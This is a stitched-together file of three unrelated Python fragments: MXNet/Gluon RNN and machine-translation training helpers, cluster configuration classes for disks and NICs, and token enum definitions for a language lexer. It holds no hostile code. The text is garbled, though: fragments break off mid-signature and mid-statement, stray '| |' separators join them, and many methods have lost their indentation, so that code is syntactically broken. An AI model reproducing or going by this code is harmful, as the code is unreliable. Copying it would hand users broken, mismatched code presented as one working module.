# Defined in file: ./chapter_recurrent-neural-networks/rnn-scratch.md
class RNNModelScratch(object):
    """A RNN Model based on scratch implementations.

    `get_params`, `init_state` and `forward` are injected callables, so the
    same wrapper serves different scratch RNN variants.
    """
    def __init__(self, vocab_size, num_hiddens, ctx,
                 get_params, init_state, forward):
        self.vocab_size, self.num_hiddens = vocab_size, num_hiddens
        self.params = get_params(vocab_size, num_hiddens, ctx)
        self.init_state, self.forward_fn = init_state, forward
    def __call__(self, X, state):
        # One-hot encode the transposed input so the leading axis is time.
        X = nd.one_hot(X.T, self.vocab_size)
        return self.forward_fn(X, state, self.params)
    def begin_state(self, batch_size, ctx):
        # Delegate initial-state creation to the injected initializer.
        return self.init_state(batch_size, self.num_hiddens, ctx)
# Defined in file: ./chapter_recurrent-neural-networks/rnn-scratch.md
def predict_ch8(prefix, num_predicts, model, vocab, ctx):
    """Generate `num_predicts` characters following `prefix` with `model`,
    greedily taking the argmax token at each step; return the full string."""
    state = model.begin_state(batch_size=1, ctx=ctx)
    outputs = [vocab[prefix[0]]]
    # Feed the most recent output token back in as a (1, 1) array.
    get_input = lambda: nd.array([outputs[-1]], ctx=ctx).reshape((1, 1))
    for y in prefix[1:]:  # Warmup state with prefix
        _, state = model(get_input(), state)
        outputs.append(vocab[y])
    for _ in range(num_predicts):  # Predict num_predicts steps
        Y, state = model(get_input(), state)
        outputs.append(int(Y.argmax(axis=1).reshape(1).asscalar()))
    return ''.join([vocab.idx_to_token[i] for i in outputs])
# Defined in file: ./chapter_recurrent-neural-networks/rnn-scratch.md
def grad_clipping(model, theta):
    """Clip gradients in place so their global L2 norm is at most `theta`."""
    if isinstance(model, gluon.Block):
        # Gluon model: gather the parameter arrays from the param dict.
        params = [p.data() for p in model.collect_params().values()]
    else:
        # Scratch model keeps its parameters in a plain list.
        params = model.params
    norm = math.sqrt(sum((p.grad ** 2).sum().asscalar() for p in params))
    if norm > theta:
        # Rescale every gradient by theta / norm.
        for param in params:
            param.grad[:] *= theta / norm
# Defined in file: ./chapter_recurrent-neural-networks/rnn-scratch.md
def train_epoch_ch8(model, train_iter, loss, updater, ctx, use_random_iter):
    """Train `model` for one epoch; return (perplexity, tokens per second)."""
    state, timer = None, d2l.Timer()
    metric = d2l.Accumulator(2)  # loss_sum, num_examples
    for X, Y in train_iter:
        if state is None or use_random_iter:
            # Initialize state when either it's the first iteration or
            # using random sampling.
            state = model.begin_state(batch_size=X.shape[0], ctx=ctx)
        else:
            # Consecutive sampling: carry the state over but detach it so
            # backprop stops at the batch boundary.
            for s in state: s.detach()
        y = Y.T.reshape((-1,))
        X, y = X.as_in_context(ctx), y.as_in_context(ctx)
        with autograd.record():
            py, state = model(X, state)
            l = loss(py, y).mean()
        l.backward()
        grad_clipping(model, 1)
        updater(batch_size=1)  # Since used mean already.
        metric.add(l.asscalar() * y.size, y.size)
    # Perplexity = exp(mean cross-entropy loss over all tokens).
    return math.exp(metric[0]/metric[1]), metric[1]/timer.stop()
# Defined in file: ./chapter_recurrent-neural-networks/rnn-scratch.md
def train_ch8(model, train_iter, vocab, lr, num_epochs, ctx,
              use_random_iter=False):
    """Train a character-level language model and plot/print perplexity.

    Handles both Gluon models (SGD via a Trainer) and scratch models
    (plain d2l.sgd on model.params).
    """
    # Initialize
    loss = gluon.loss.SoftmaxCrossEntropyLoss()
    animator = d2l.Animator(xlabel='epoch', ylabel='perplexity',
                            legend=['train'], xlim=[1, num_epochs])
    if isinstance(model, gluon.Block):
        model.initialize(ctx=ctx, force_reinit=True, init=init.Normal(0.01))
        trainer = gluon.Trainer(model.collect_params(), 'sgd', {'learning_rate': lr})
        updater = lambda batch_size : trainer.step(batch_size)
    else:
        updater = lambda batch_size : d2l.sgd(model.params, lr, batch_size)
    predict = lambda prefix: predict_ch8(prefix, 50, model, vocab, ctx)
    # Train and check the progress.
    for epoch in range(num_epochs):
        ppl, speed = train_epoch_ch8(
            model, train_iter, loss, updater, ctx, use_random_iter)
        if epoch % 10 == 0:
            # Periodically sample generated text to eyeball progress.
            print(predict('time traveller'))
            animator.add(epoch+1, [ppl])
    print('Perplexity %.1f, %d tokens/sec on %s' % (ppl, speed, ctx))
    print(predict('time traveller'))
    print(predict('traveller'))
# Defined in file: ./chapter_recurrent-neural-networks/rnn-gluon.md
class RNNModel(nn.Block):
    """Gluon RNN wrapper: an `rnn_layer` followed by a dense output layer
    projecting hidden states onto the vocabulary."""
    def __init__(self, rnn_layer, vocab_size, **kwargs):
        super(RNNModel, self).__init__(**kwargs)
        self.rnn = rnn_layer
        self.vocab_size = vocab_size
        self.dense = nn.Dense(vocab_size)
    def forward(self, inputs, state):
        # One-hot encode the transposed input so the leading axis is time.
        X = nd.one_hot(inputs.T, self.vocab_size)
        Y, state = self.rnn(X, state)
        # The fully connected layer will first change the shape of Y to
        # (num_steps * batch_size, num_hiddens)
        # Its output shape is (num_steps * batch_size, vocab_size)
        output = self.dense(Y.reshape((-1, Y.shape[-1])))
        return output, state
    def begin_state(self, *args, **kwargs):
        # Delegate initial-state creation to the wrapped RNN layer.
        return self.rnn.begin_state(*args, **kwargs)
# Defined in file: ./chapter_recurrent-neural-networks/machine-translation.md
def read_data_nmt():
    """Download the English-French corpus and return its raw text."""
    archive = gluon.utils.download('http://data.mxnet.io/data/fra-eng.zip')
    with zipfile.ZipFile(archive, 'r') as zf:
        return zf.read('fra.txt').decode("utf-8")
# Defined in file: ./chapter_recurrent-neural-networks/machine-translation.md
def preprocess_nmt(text):
    """Lowercase `text`, normalize non-breaking spaces, and insert a
    space before any ',', '!' or '.' that does not already follow one."""
    # Lowering first is safe: the previous-char test only compares to ' '.
    text = text.replace('\u202f', ' ').replace('\xa0', ' ').lower()
    out = []
    for i, char in enumerate(text):
        if i > 0 and char in (',', '!', '.') and text[i - 1] != ' ':
            out.append(' ')
        out.append(char)
    return ''.join(out)
# Defined in file: ./chapter_recurrent-neural-networks/machine-translation.md
def tokenize_nmt(text, num_examples=None):
    """Split a tab-separated bilingual corpus into token lists.

    text: preprocessed corpus, one "source\ttarget" pair per line;
        lines without exactly one tab are skipped.
    num_examples: optional cap on the number of pairs returned
        (falsy means no cap, as before).

    Returns (source, target): two parallel lists of whitespace-token lists.
    """
    source, target = [], []
    for i, line in enumerate(text.split('\n')):
        # Bug fix: the original tested `i > num_examples`, which returned
        # num_examples + 1 pairs; `>=` honors the cap exactly.
        if num_examples and i >= num_examples:
            break
        parts = line.split('\t')
        if len(parts) == 2:
            source.append(parts[0].split(' '))
            target.append(parts[1].split(' '))
    return source, target
# Defined in file: ./chapter_recurrent-neural-networks/machine-translation.md
def trim_pad(line, num_steps, padding_token):
    """Clip `line` to `num_steps` tokens, or right-pad it with
    `padding_token` up to that length."""
    # Padding count is negative for long lines, so nothing is appended there.
    padded = line + [padding_token] * (num_steps - len(line))
    return padded[:num_steps]
# Defined in file: ./chapter_recurrent-neural-networks/machine-translation.md
def build_array(lines, vocab, num_steps, is_source):
    """Map token lines to a padded index array plus per-row valid lengths.

    Target-side lines are wrapped in <bos>/<eos> markers before padding.
    """
    indexed = [vocab[tokens] for tokens in lines]
    if not is_source:
        indexed = [[vocab.bos] + seq + [vocab.eos] for seq in indexed]
    array = nd.array([trim_pad(seq, num_steps, vocab.pad) for seq in indexed])
    # Valid length = number of non-padding entries per row.
    valid_len = (array != vocab.pad).sum(axis=1)
    return array, valid_len
# Defined in file: ./chapter_recurrent-neural-networks/machine-translation.md
def load_data_nmt(batch_size, num_steps, num_examples=1000):
    """Build source/target vocabularies and a training iterator for NMT.

    Returns (src_vocab, tgt_vocab, data_iter); each batch yields padded
    index arrays together with per-sentence valid lengths.
    """
    text = preprocess_nmt(read_data_nmt())
    source, target = tokenize_nmt(text, num_examples)
    # Rare tokens (freq < 3) are dropped; special tokens (pad/bos/eos) added.
    src_vocab = d2l.Vocab(source, min_freq=3, use_special_tokens=True)
    tgt_vocab = d2l.Vocab(target, min_freq=3, use_special_tokens=True)
    src_array, src_valid_len = build_array(
        source, src_vocab, num_steps, True)
    tgt_array, tgt_valid_len = build_array(
        target, tgt_vocab, num_steps, False)
    data_arrays = (src_array, src_valid_len, tgt_array, tgt_valid_len)
    data_iter = d2l.load_array(data_arrays, batch_size)
    return src_vocab, tgt_vocab, data_iter
# Defined in file: ./chapter_recurrent-neural-networks/encoder-decoder.md
class Encoder(nn.Block):
    """Base encoder interface for the encoder-decoder architecture.

    Concrete subclasses must override `forward`.
    """

    def __init__(self, **kwargs):
        super(Encoder, self).__init__(**kwargs)

    def forward(self, X):
        raise NotImplementedError
# Defined in file: ./chapter_recurrent-neural-networks/encoder-decoder.md
class Decoder(nn.Block):
    """Base decoder interface for the encoder-decoder architecture.

    Concrete subclasses must override `init_state` (derive the initial
    decoding state from encoder outputs) and `forward`.
    """

    def __init__(self, **kwargs):
        super(Decoder, self).__init__(**kwargs)

    def init_state(self, enc_outputs, *args):
        raise NotImplementedError

    def forward(self, X, state):
        raise NotImplementedError
# Defined in file: ./chapter_recurrent-neural-networks/encoder-decoder.md
class EncoderDecoder(nn.Block):
    """Compose an encoder and a decoder into one trainable Block."""

    def __init__(self, encoder, decoder, **kwargs):
        super(EncoderDecoder, self).__init__(**kwargs)
        self.encoder = encoder
        self.decoder = decoder

    def forward(self, enc_X, dec_X, *args):
        # Encode, derive the decoder's initial state, then decode.
        enc_outputs = self.encoder(enc_X, *args)
        dec_state = self.decoder.init_state(enc_outputs, *args)
        return self.decoder(dec_X, dec_state)
# Defined in file: ./chapter_recurrent-neural-networks/seq2seq.md
class Seq2SeqEncoder(d2l.Encoder):
def __init__(self, vocab_size, embed_size, num_hiddens, | |
  def FromDict(cls, val):
    """Custom function for top-level config data

    Deserializes the nested members (cluster, nodes, instances,
    nodegroups, networks) from their dict form into config objects.
    """
    obj = super(ConfigData, cls).FromDict(val)
    obj.cluster = Cluster.FromDict(obj.cluster)
    obj.nodes = outils.ContainerFromDicts(obj.nodes, dict, Node)
    obj.instances = \
      outils.ContainerFromDicts(obj.instances, dict, Instance)
    obj.nodegroups = \
      outils.ContainerFromDicts(obj.nodegroups, dict, NodeGroup)
    obj.networks = outils.ContainerFromDicts(obj.networks, dict, Network)
    return obj
def HasAnyDiskOfType(self, dev_type):
"""Check if in there is at disk of the given type in the configuration.
@type dev_type: L{constants.DTS_BLOCK}
@param dev_type: the type to look for
@rtype: boolean
@return: boolean indicating if a disk of the given type was found or not
"""
for instance in self.instances.values():
for disk in instance.disks:
if disk.IsBasedOnDiskType(dev_type):
return True
return False
  def UpgradeConfig(self):
    """Fill defaults for missing configuration values.

    Recursively upgrades the cluster, node, instance, nodegroup and
    network objects, then fills cluster-level defaults that depend on
    the upgraded state (enabled disk templates, DRBD helper).
    """
    self.cluster.UpgradeConfig()
    for node in self.nodes.values():
      node.UpgradeConfig()
    for instance in self.instances.values():
      instance.UpgradeConfig()
    # Must run after instances are upgraded: it infers templates from them.
    self._UpgradeEnabledDiskTemplates()
    if self.nodegroups is None:
      self.nodegroups = {}
    for nodegroup in self.nodegroups.values():
      nodegroup.UpgradeConfig()
      InstancePolicy.UpgradeDiskTemplates(
        nodegroup.ipolicy, self.cluster.enabled_disk_templates)
    if self.cluster.drbd_usermode_helper is None:
      # Default the DRBD helper only if DRBD is actually enabled.
      if self.cluster.IsDiskTemplateEnabled(constants.DT_DRBD8):
        self.cluster.drbd_usermode_helper = constants.DEFAULT_DRBD_HELPER
    if self.networks is None:
      self.networks = {}
    for network in self.networks.values():
      network.UpgradeConfig()
  def _UpgradeEnabledDiskTemplates(self):
    """Upgrade the cluster's enabled disk templates by inspecting the currently
    enabled and/or used disk templates.

    Only acts when the cluster has no enabled_disk_templates yet; in that
    case the set is inferred from existing instances (plus drbd/plain when
    LVM is configured) and ordered by Ganeti's historical preference.
    """
    if not self.cluster.enabled_disk_templates:
      template_set = \
        set([inst.disk_template for inst in self.instances.values()])
      # Add drbd and plain, if lvm is enabled (by specifying a volume group)
      if self.cluster.volume_group_name:
        template_set.add(constants.DT_DRBD8)
        template_set.add(constants.DT_PLAIN)
      # Set enabled_disk_templates to the inferred disk templates. Order them
      # according to a preference list that is based on Ganeti's history of
      # supported disk templates.
      self.cluster.enabled_disk_templates = []
      for preferred_template in constants.DISK_TEMPLATE_PREFERENCE:
        if preferred_template in template_set:
          self.cluster.enabled_disk_templates.append(preferred_template)
          template_set.remove(preferred_template)
      # Any remaining (unranked) templates are appended in arbitrary order.
      self.cluster.enabled_disk_templates.extend(list(template_set))
    InstancePolicy.UpgradeDiskTemplates(
      self.cluster.ipolicy, self.cluster.enabled_disk_templates)
class NIC(ConfigObject):
  """Config object representing a network card."""
  __slots__ = ["name", "mac", "ip", "network",
               "nicparams", "netinfo", "pci"] + _UUID

  @classmethod
  def CheckParameterSyntax(cls, nicparams):
    """Validate a NIC parameter dictionary.

    @type nicparams: dict
    @param nicparams: dictionary with parameter names/value
    @raise errors.ConfigurationError: when a parameter is not valid

    """
    mode = nicparams[constants.NIC_MODE]
    mode_is_valid = (mode in constants.NIC_VALID_MODES or
                     mode == constants.VALUE_AUTO)
    if not mode_is_valid:
      raise errors.ConfigurationError("Invalid NIC mode '%s'" % mode)
    # Bridged NICs must name the bridge they attach to.
    if mode == constants.NIC_MODE_BRIDGED and not nicparams[constants.NIC_LINK]:
      raise errors.ConfigurationError("Missing bridged NIC link")
class Disk(ConfigObject):
  """Config object representing a block device.

  Disks form a tree through C{children} (e.g. a DRBD device whose data
  resides on child LVM volumes).
  """
  __slots__ = (["name", "dev_type", "logical_id", "children", "iv_name",
                "size", "mode", "params", "spindles", "pci"] + _UUID +
               # dynamic_params is special. It depends on the node this instance
               # is sent to, and should not be persisted.
               ["dynamic_params"])
  def CreateOnSecondary(self):
    """Test if this device needs to be created on a secondary node."""
    # Only DRBD and plain LVM devices are created on secondaries.
    return self.dev_type in (constants.DT_DRBD8, constants.DT_PLAIN)
  def AssembleOnSecondary(self):
    """Test if this device needs to be assembled on a secondary node."""
    # Same type set as CreateOnSecondary: DRBD and plain LVM.
    return self.dev_type in (constants.DT_DRBD8, constants.DT_PLAIN)
  def OpenOnSecondary(self):
    """Test if this device needs to be opened on a secondary node."""
    # Only plain LVM devices are opened on the secondary.
    return self.dev_type in (constants.DT_PLAIN,)
def StaticDevPath(self):
"""Return the device path if this device type has a static one.
Some devices (LVM for example) live always at the same /dev/ path,
irrespective of their status. For such devices, we return this
path, for others we return None.
@warning: The path returned is not a normalized pathname; callers
should check that it is a valid path.
"""
if self.dev_type == constants.DT_PLAIN:
return "/dev/%s/%s" % (self.logical_id[0], self.logical_id[1])
elif self.dev_type == constants.DT_BLOCK:
return self.logical_id[1]
elif self.dev_type == constants.DT_RBD:
return "/dev/%s/%s" % (self.logical_id[0], self.logical_id[1])
return None
def ChildrenNeeded(self):
"""Compute the needed number of children for activation.
This method will return either -1 (all children) or a positive
number denoting the minimum number of children needed for
activation (only mirrored devices will usually return >=0).
Currently, only DRBD8 supports diskless activation (therefore we
return 0), for all other we keep the previous semantics and return
-1.
"""
if self.dev_type == constants.DT_DRBD8:
return 0
return -1
def IsBasedOnDiskType(self, dev_type):
"""Check if the disk or its children are based on the given type.
@type dev_type: L{constants.DTS_BLOCK}
@param dev_type: the type to look for
@rtype: boolean
@return: boolean indicating if a device of the given type was found or not
"""
if self.children:
for child in self.children:
if child.IsBasedOnDiskType(dev_type):
return True
return self.dev_type == dev_type
  def GetNodes(self, node_uuid):
    """This function returns the nodes this device lives on.

    Given the node on which the parent of the device lives on (or, in
    case of a top-level device, the primary node of the devices'
    instance), this function will return a list of nodes on which this
    devices needs to (or can) be assembled.
    """
    if self.dev_type in [constants.DT_PLAIN, constants.DT_FILE,
                         constants.DT_BLOCK, constants.DT_RBD,
                         constants.DT_EXT, constants.DT_SHARED_FILE]:
      # Node-local device types live on the parent's node only.
      result = [node_uuid]
    elif self.dev_type in constants.DTS_DRBD:
      # DRBD stores its two peer node UUIDs in the logical id.
      result = [self.logical_id[0], self.logical_id[1]]
      if node_uuid not in result:
        raise errors.ConfigurationError("DRBD device passed unknown node")
    else:
      raise errors.ProgrammerError("Unhandled device type %s" % self.dev_type)
    return result
  def ComputeNodeTree(self, parent_node_uuid):
    """Compute the node/disk tree for this disk and its children.

    This method, given the node on which the parent disk lives, will
    return the list of all (node UUID, disk) pairs which describe the disk
    tree in the most compact way. For example, a drbd/lvm stack
    will be returned as (primary_node, drbd) and (secondary_node, drbd)
    which represents all the top-level devices on the nodes.
    """
    my_nodes = self.GetNodes(parent_node_uuid)
    result = [(node, self) for node in my_nodes]
    if not self.children:
      # leaf device
      return result
    for node in my_nodes:
      for child in self.children:
        child_result = child.ComputeNodeTree(node)
        if len(child_result) == 1:
          # child (and all its descendants) is simple, doesn't split
          # over multiple hosts, so we don't need to describe it, our
          # own entry for this node describes it completely
          continue
        else:
          # check if child nodes differ from my nodes; note that
          # subdisk can differ from the child itself, and be instead
          # one of its descendants
          for subnode, subdisk in child_result:
            if subnode not in my_nodes:
              result.append((subnode, subdisk))
            # otherwise child is under our own node, so we ignore this
            # entry (but probably the other results in the list will
            # be different)
    return result
def ComputeGrowth(self, amount):
"""Compute the per-VG growth requirements.
This only works for VG-based disks.
@type amount: integer
@param amount: the desired increase in (user-visible) disk space
@rtype: dict
@return: a dictionary of volume-groups and the required size
"""
if self.dev_type == constants.DT_PLAIN:
return {self.logical_id[0]: amount}
elif self.dev_type == constants.DT_DRBD8:
if self.children:
return self.children[0].ComputeGrowth(amount)
else:
return {}
else:
# Other disk types do not require VG space
return {}
  def RecordGrow(self, amount):
    """Update the size of this disk after growth.

    This method recurses over the disks's children and updates their
    size correspondingly. The method needs to be kept in sync with the
    actual algorithms from bdev.
    """
    if self.dev_type in (constants.DT_PLAIN, constants.DT_FILE,
                         constants.DT_RBD, constants.DT_EXT,
                         constants.DT_SHARED_FILE):
      self.size += amount
    elif self.dev_type == constants.DT_DRBD8:
      # DRBD grows both its data child and its own recorded size.
      if self.children:
        self.children[0].RecordGrow(amount)
      self.size += amount
    else:
      raise errors.ProgrammerError("Disk.RecordGrow called for unsupported"
                                   " disk type %s" % self.dev_type)
def Update(self, size=None, mode=None, spindles=None):
"""Apply changes to size, spindles and mode.
"""
if self.dev_type == constants.DT_DRBD8:
if self.children:
self.children[0].Update(size=size, mode=mode)
else:
assert not self.children
if size is not None:
self.size = size
if mode is not None:
self.mode = mode
if spindles is not None:
self.spindles = spindles
def UnsetSize(self):
"""Sets recursively the size to zero for the disk and its children.
"""
if self.children:
for child in self.children:
child.UnsetSize()
self.size = 0
def UpdateDynamicDiskParams(self, target_node_uuid, nodes_ip):
"""Updates the dynamic disk params for the given node.
This is mainly used for drbd, which needs ip/port configuration.
Arguments:
- target_node_uuid: the node UUID we wish to configure for
- nodes_ip: a mapping of node name to ip
The target_node must exist in nodes_ip, and should be one of the
nodes in the logical ID if this device is a DRBD device.
"""
if self.children:
for child in self.children:
child.UpdateDynamicDiskParams(target_node_uuid, nodes_ip)
dyn_disk_params = {}
if self.logical_id is not None and self.dev_type in constants.DTS_DRBD:
pnode_uuid, snode_uuid, _, pminor, sminor, _ = self.logical_id
if target_node_uuid not in (pnode_uuid, snode_uuid):
# disk object is being sent to neither the primary nor the secondary
# node. reset the dynamic parameters, the target node is not
# supposed to use them.
self.dynamic_params | |
""" Lexemes base definitions for the lexemes module. """
from enum import Enum
# Definitions
# ============================================================================
# Characters
# ----------------------------------------------------------------------------
def char_range(first, last):
    """ Set of characters first..last (both endpoints included). """
    return {chr(code) for code in range(ord(first), ord(last) + 1)}
EOF = chr(26)  # ASCII SUB, used as an end-of-file sentinel character
EOL = "\n"
SPACE = set("\n\r\v\f\t ")  # whitespace characters
ESCAPED1 = set("ntvbrfa")  # letters usable after a backslash escape
ESCAPED2 = set("\\?'\"()[]{}")  # punctuation usable after a backslash escape
ESCAPED = ESCAPED1 | ESCAPED2
OCTAL = char_range("0", "7")
DIGIT = OCTAL | {"8", "9"}
XDIGIT2 = char_range("A", "F")
XDIGIT3 = char_range("a", "f")
XDIGIT = DIGIT | XDIGIT2 | XDIGIT3  # hexadecimal digits
IDENTFST1 = char_range("a", "z")
IDENTFST2 = char_range("A", "Z")
IDENTFST3 = {"_"}
IDENTFST = IDENTFST1 | IDENTFST2 | IDENTFST3  # chars that may start an identifier
IDENTRST3 = {"'", "$"}
IDENTRST = IDENTFST | DIGIT | IDENTRST3  # chars that may continue an identifier
SYMBOLIC = set("%&+-./:=@~`^|*!?<>#")  # chars forming symbolic identifiers
X = set("xX")  # presumably hex-literal prefix letters -- confirm in lexer
P = set("pP")  # presumably hex-float exponent markers -- confirm in lexer
E = set("eE")  # presumably decimal exponent markers -- confirm in lexer
SIGN = set("-+")
FL = set("fFlL")  # presumably float/long literal suffixes -- confirm in lexer
LU = set("LlUu")  # presumably integer literal suffixes -- confirm in lexer
EXTCODE_TAG = set("#$^")
OTHERS = set("()[]{},;")  # standalone punctuation tokens
# Non‑finals
# ----------------------------------------------------------------------------
class NonFin(Enum):
    """ Non-final lexical products.

    Intermediate token categories recognized by the lexer; each member
    is later collapsed to a final product via NONFINS_TRANSL (the
    mapping is asserted to be total over this enum).
    """
    ABSPROP = "ABSPROP"
    ABST0YPE = "ABST0YPE"
    ABSTYPE = "ABSTYPE"
    ABSVIEW = "ABSVIEW"
    ABSVIEWT0YPE = "ABSVIEWT0YPE"
    ABSVIEWTYPE = "ABSVIEWTYPE"
    CASE = "CASE"
    CASE_neg = "CASE_neg"
    CASE_pos = "CASE_pos"
    CASTFN = "CASTFN"
    COMMENT_block_c = "COMMENT_block_c"
    COMMENT_block_ml = "COMMENT_block_ml"
    DATAPROP = "DATAPROP"
    DATATYPE = "DATATYPE"
    DATAVIEW = "DATAVIEW"
    DATAVTYPE = "DATAVTYPE"
    DLRDELAY = "DLRDELAY"
    DLREFFMASK_ALL = "DLREFFMASK_ALL"
    DLREFFMASK_EXN = "DLREFFMASK_EXN"
    DLREFFMASK_NTM = "DLREFFMASK_NTM"
    DLREFFMASK_REF = "DLREFFMASK_REF"
    DLREFFMASK_WRT = "DLREFFMASK_WRT"
    DLRLDELAY = "DLRLDELAY"
    DLRLST = "DLRLST"
    DLRLST_T = "DLRLST_T"
    DLRLST_VT = "DLRLST_VT"
    DLRREC = "DLRREC"
    DLRREC_T = "DLRREC_T"
    DLRREC_VT = "DLRREC_VT"
    DLRTUP = "DLRTUP"
    DLRTUP_T = "DLRTUP_T"
    DLRTUP_VT = "DLRTUP_VT"
    DLRVCOPYENV_V = "DLRVCOPYENV_V"
    DLRVCOPYENV_VT = "DLRVCOPYENV_VT"
    FIX = "FIX"
    FIXAT = "FIXAT"
    FN = "FN"
    FNX = "FNX"
    FUN = "FUN"
    IMPLEMENT = "IMPLEMENT"
    IMPLMNT = "IMPLMNT"
    INFIX = "INFIX"
    INFIXL = "INFIXL"
    INFIXR = "INFIXR"
    LAM = "LAM"
    LAMAT = "LAMAT"
    LLAM = "LLAM"
    LLAMAT = "LLAMAT"
    MACDEF = "MACDEF"
    MACRODEF = "MACRODEF"
    POSTFIX = "POSTFIX"
    PRAXI = "PRAXI"
    PREFIX = "PREFIX"
    PRFN = "PRFN"
    PRFUN = "PRFUN"
    PRIMPLMNT = "PRIMPLMNT"
    PROP = "PROP"
    PROPDEF = "PROPDEF"
    PROP_neg = "PROP_neg"
    PROP_pos = "PROP_pos"
    PRVAL = "PRVAL"
    PRVAR = "PRVAR"
    T0YPE = "T0YPE"
    T0YPE_neg = "T0YPE_neg"
    T0YPE_pos = "T0YPE_pos"
    TYPE = "TYPE"
    TYPEDEF = "TYPEDEF"
    TYPE_neg = "TYPE_neg"
    TYPE_pos = "TYPE_pos"
    VAL = "VAL"
    VAL_neg = "VAL_neg"
    VAL_pos = "VAL_pos"
    VAR = "VAR"
    VIEW = "VIEW"
    VIEWDEF = "VIEWDEF"
    VIEW_neg = "VIEW_neg"
    VIEW_pos = "VIEW_pos"
    VIEWT0YPE = "VIEWT0YPE"
    VIEWT0YPE_neg = "VIEWT0YPE_neg"
    VIEWT0YPE_pos = "VIEWT0YPE_pos"
    VIEWTYPE = "VIEWTYPE"
    VIEWTYPEDEF = "VIEWTYPEDEF"
    VIEWTYPE_neg = "VIEWTYPE_neg"
    VIEWTYPE_pos = "VIEWTYPE_pos"
    WITHPROP = "WITHPROP"
    WITHTYPE = "WITHTYPE"
    WITHVIEW = "WITHVIEW"
    WITHVIEWTYPE = "WITHVIEWTYPE"
# Finals
# ----------------------------------------------------------------------------
class Fin(Enum):
    """ Final lexical products.

    Token categories ultimately emitted by the lexer. Members marked
    "Renamed"/"Added" diverge from the original naming scheme this
    enum was derived from.
    """
    T_ABSTYPE = "T_ABSTYPE"
    T_ADDRAT = "T_ADDRAT"
    T_ADDR_OR_IDENT = "T_ADDR_OR_IDENT"  # Renamed
    T_AND = "T_AND"
    T_ASSUME = "T_ASSUME"
    T_AS = "T_AS"
    T_ATLBRACE = "T_ATLBRACE"
    T_ATLBRACKET = "T_ATLBRACKET"
    T_ATLPAREN = "T_ATLPAREN"
    T_AT_OR_SIDENT = "T_AT_OR_SIDENT"  # Renamed
    T_BACKSLASH_OR_IDENT = "T_BACKSLASH_OR_IDENT"  # Renamed
    T_BANG_OR_IDENT = "T_BANG_OR_IDENT"  # Renamed
    T_BAR = "T_BAR"
    T_BEGIN = "T_BEGIN"
    T_BQUOTELPAREN = "T_BQUOTELPAREN"
    T_BQUOTE = "T_BQUOTE"
    T_CASE = "T_CASE"
    T_CHAR = "T_CHAR"
    T_CLASSDEC = "T_CLASSDEC"
    T_COLONLT = "T_COLONLT"
    T_COLON = "T_COLON"
    T_COMMALPAREN = "T_COMMALPAREN"
    T_COMMA = "T_COMMA"
    T_COMMENT_block = "T_COMMENT_block"
    T_COMMENT_line = "T_COMMENT_line"
    T_COMMENT_rest = "T_COMMENT_rest"
    T_DATASORT = "T_DATASORT"
    T_DATATYPE = "T_DATATYPE"
    T_DLRARRPSZ = "T_DLRARRPSZ"
    T_DLRBREAK = "T_DLRBREAK"
    T_DLRCONTINUE = "T_DLRCONTINUE"
    T_DLRD2CTYPE = "T_DLRD2CTYPE"
    T_DLRDELAY = "T_DLRDELAY"
    T_DLREFFMASK_ARG = "T_DLREFFMASK_ARG"
    T_DLREFFMASK = "T_DLREFFMASK"
    T_DLREXTERN = "T_DLREXTERN"
    T_DLREXTFCALL = "T_DLREXTFCALL"
    T_DLREXTKIND = "T_DLREXTKIND"
    T_DLREXTMCALL = "T_DLREXTMCALL"
    T_DLREXTVAL = "T_DLREXTVAL"
    T_DLREXTYPE_STRUCT = "T_DLREXTYPE_STRUCT"
    T_DLREXTYPE = "T_DLREXTYPE"
    T_DLRLITERAL = "T_DLRLITERAL"
    T_DLRLST = "T_DLRLST"
    T_DLRMYFILENAME = "T_DLRMYFILENAME"
    T_DLRMYFUNCTION = "T_DLRMYFUNCTION"
    T_DLRMYLOCATION = "T_DLRMYLOCATION"
    T_DLRRAISE = "T_DLRRAISE"
    T_DLRREC = "T_DLRREC"
    T_DLRSHOWTYPE = "T_DLRSHOWTYPE"
    T_DLRSOLASSERT = "T_DLRSOLASSERT"
    T_DLRSOLVERIFY = "T_DLRSOLVERIFY"
    T_DLRTEMPENVER = "T_DLRTEMPENVER"
    T_DLRTUP = "T_DLRTUP"
    T_DLRTYREP = "T_DLRTYREP"
    T_DLRVARARG = "T_DLRVARARG"
    T_DLRVCOPYENV = "T_DLRVCOPYENV"
    T_DOLLAR = "T_DOLLAR"
    T_DO = "T_DO"
    T_DOTDOTDOT = "T_DOTDOTDOT"
    T_DOTDOT = "T_DOTDOT"
    T_DOTINT = "T_DOTINT"
    T_DOTLTGTDOT = "T_DOTLTGTDOT"
    T_DOTLT = "T_DOTLT"
    T_DOT = "T_DOT"
    T_ELSE = "T_ELSE"
    T_END = "T_END"
    T_EOF = "T_EOF"
    T_EQGTGT = "T_EQGTGT"
    T_EQGT = "T_EQGT"
    T_EQLTGT = "T_EQLTGT"
    T_EQLT = "T_EQLT"
    T_EQSLASHEQGTGT = "T_EQSLASHEQGTGT"
    T_EQSLASHEQGT = "T_EQSLASHEQGT"
    T_EQ_OR_DIDENT = "T_EQ_OR_DIDENT"  # Renamed
    T_ERR = "T_ERR"
    T_EXCEPTION = "T_EXCEPTION"
    T_EXTCODE = "T_EXTCODE"
    T_EXTERN = "T_EXTERN"
    T_EXTVAR = "T_EXTVAR"
    T_EXTYPE = "T_EXTYPE"
    T_FIXITY = "T_FIXITY"
    T_FIX = "T_FIX"
    T_FLOAT = "T_FLOAT"
    T_FOLDAT = "T_FOLDAT"
    T_FOLD_OR_IDENT = "T_FOLD_OR_IDENT"  # Renamed
    T_FORSTAR = "T_FORSTAR"
    T_FOR = "T_FOR"
    T_FREEAT = "T_FREEAT"
    T_FREE_OR_IDENT = "T_FREE_OR_IDENT"  # Renamed
    T_FUN = "T_FUN"
    T_GTDOT = "T_GTDOT"
    T_GTLT_OR_DIDENT = "T_GTLT_OR_DIDENT"  # Renamed
    T_GT_OR_IDENT = "T_GT_OR_IDENT"  # Renamed
    T_HASHLBRACKET = "T_HASHLBRACKET"
    T_HASH = "T_HASH"
    T_IDENT_alp = "T_IDENT_alp"
    T_IDENT_arr = "T_IDENT_arr"
    T_IDENT_dlr = "T_IDENT_dlr"
    T_IDENT_ext = "T_IDENT_ext"
    T_IDENT_srp = "T_IDENT_srp"
    T_IDENT_sym = "T_IDENT_sym"
    T_IDENT_tmp = "T_IDENT_tmp"
    T_IFCASE = "T_IFCASE"
    T_IF = "T_IF"
    T_IMPLEMENT = "T_IMPLEMENT"
    T_IMPORT = "T_IMPORT"
    T_INT = "T_INT"
    T_IN = "T_IN"
